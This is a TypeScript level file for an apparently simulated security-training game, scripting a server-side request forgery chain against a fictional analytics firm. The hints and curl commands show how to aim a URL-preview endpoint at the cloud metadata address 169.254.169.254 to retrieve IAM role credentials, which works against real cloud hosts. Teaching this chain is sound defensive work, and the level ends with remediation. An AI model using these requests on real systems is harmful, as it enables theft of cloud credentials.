import type { ChainDef } from "../../types";
import { match, cmd } from "../../engine";

const IP = "198.51.100.10";

export const mediumLevel1: ChainDef = {
  id: "medium-1",
  difficulty: "medium",
  order: 1,
  points: 70,
  title: "Fetch Request",
  codename: "OPERATION FETCH REQUEST",
  summary: "A feature that fetches a URL on your behalf will fetch any URL you give it — including ones it was never supposed to reach.",
  briefing: [
    "Prairie Analytics runs marketing-attribution dashboards for a couple dozen mid-size retailers out",
    "of a small office in Wichita. Their reporting tool has a 'link preview' feature — paste a URL,",
    "it fetches the page server-side and shows you a thumbnail.",
    "",
    "That means the server, not your browser, is the one making the request. Anything the server can",
    "reach, that feature can reach. Find out what that actually includes.",
  ],
  debrief: [
    "root cause: the link-preview feature performed a server-side HTTP request to any URL supplied by",
    "the user with no allowlist and no block on internal address ranges (SSRF, CWE-918). Pointed at the",
    "cloud instance metadata service, it handed over the box's own IAM role credentials.",
    "",
    "PRAIRIE ANALYTICS: SECURED.",
  ],
  nodes: [
    {
      id: "prairie",
      org: "Prairie Analytics",
      city: "Wichita",
      state: "KS",
      coords: { x: 46, y: 34 },
      ip: IP,
      tagline: "Marketing-attribution dashboards for regional retailers",
      briefing: [
        "TARGET: Prairie Analytics reporting platform",
        `IP: ${IP}`,
        "KNOWN: public-facing dashboard with a 'preview a link' feature that fetches URLs server-side.",
        "",
        "Find out what that fetch can actually reach.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Client says the preview feature 'just grabs a thumbnail.' Nobody's ever asked what network",
        "   that grab happens from.\"",
      ],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Discover the server-side link-preview endpoint", tactic: "Discovery", requires: ["recon"] },
        {
          id: "ssrf",
          label: "Point the fetch at the cloud metadata service and enumerate the IAM role",
          tactic: "Discovery",
          requires: ["identify"],
        },
        { id: "creds", label: "Retrieve the role's temporary credentials via the metadata service", tactic: "Credential Access", requires: ["ssrf"] },
        { id: "secure", label: "Block internal address ranges and rotate the exposed credentials", tactic: "Remediation", requires: ["creds"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`. Then hit the web root and look for a feature that takes a URL as input.",
        "The preview feature fetches whatever URL you give it, from the server, not your browser. Cloud instances usually expose a metadata service at 169.254.169.254 — try pointing the preview at it.",
        "`/latest/meta-data/iam/security-credentials/` on the metadata service lists the role name attached to this instance, before you even need a specific credential name.",
        "Once you have the role name, request `/latest/meta-data/iam/security-credentials/<role-name>` — that returns the actual temporary access key, secret key, and session token.",
      ],
      debrief: [
        "root cause: /api/preview?url= performed an unrestricted server-side fetch of any supplied URL,",
        "including the cloud metadata service's link-local address — a classic SSRF-to-credential-theft chain.",
        "fix applied: internal/link-local ranges blocked at the fetch layer, instance role credentials rotated.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT   STATE SERVICE VERSION",
              "80/tcp open  http    Node.js Express (Prairie Analytics dashboard)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds",
            ],
          }),
        }),
        cmd({
          id: "curl-root",
          tool: "curl",
          requires: [IP],
          forbids: ["preview"],
          help: "curl http://<ip>      — fetch the web root",
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["found_preview"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Prairie Analytics — Attribution Dashboard</title>",
              '<form action="/api/preview" method="GET"><input name="url"></form>',
              "",
              "tip: this fetches server-side. worth finding out what 'server-side' can reach.",
            ],
          }),
        }),
        cmd({
          id: "ssrf-list-role",
          tool: "curl",
          requires: ["preview?url=", "169.254.169.254", "security-credentials"],
          forbids: ["prairie-analytics-ec2-role"],
          help: 'curl "http://<ip>/api/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"',
          requiresFlags: ["found_preview"],
          run: () => ({
            completesObjective: "ssrf",
            tone: "success",
            setsFlags: ["role_known"],
            note: "Prairie Analytics — instance IAM role: prairie-analytics-ec2-role",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "prairie-analytics-ec2-role",
              "",
              "[+] the preview feature just fetched the instance metadata service on your behalf.",
            ],
          }),
        }),
        cmd({
          id: "ssrf-get-creds",
          tool: "curl",
          requires: ["preview?url=", "169.254.169.254", "prairie-analytics-ec2-role"],
          help: 'curl "http://<ip>/api/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/prairie-analytics-ec2-role"',
          requiresFlags: ["role_known"],
          run: () => ({
            completesObjective: "creds",
            tone: "success",
            setsFlags: ["have_creds"],
            note: "Prairie Analytics — stolen IAM creds: AKIA_PRAIRIE_DEMO / temp session token via SSRF-to-metadata",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "{",
              '  "AccessKeyId": "AKIA_PRAIRIE_DEMO",',
              '  "SecretAccessKey": "d3mo/secretvalue/notreal",',
              '  "Token": "IQoJb3JpZ2luX2VjEP...",',
              '  "Expiration": "2025-01-01T00:00:00Z"',
              "}",
              "",
              "[+] live IAM credentials recovered via server-side request forgery.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — block internal ranges and rotate the credentials",
          requiresObjectives: ["creds"],
          deniedOutput: ["you should confirm the actual credential theft before filing the fix — keep going."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] blocked link-local and internal address ranges at the fetch layer",
              "[+] rotated the exposed instance role credentials",
              "[+] documented the finding as SSRF-to-metadata-credential-theft (CWE-918)",
              "",
              "PRAIRIE ANALYTICS: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
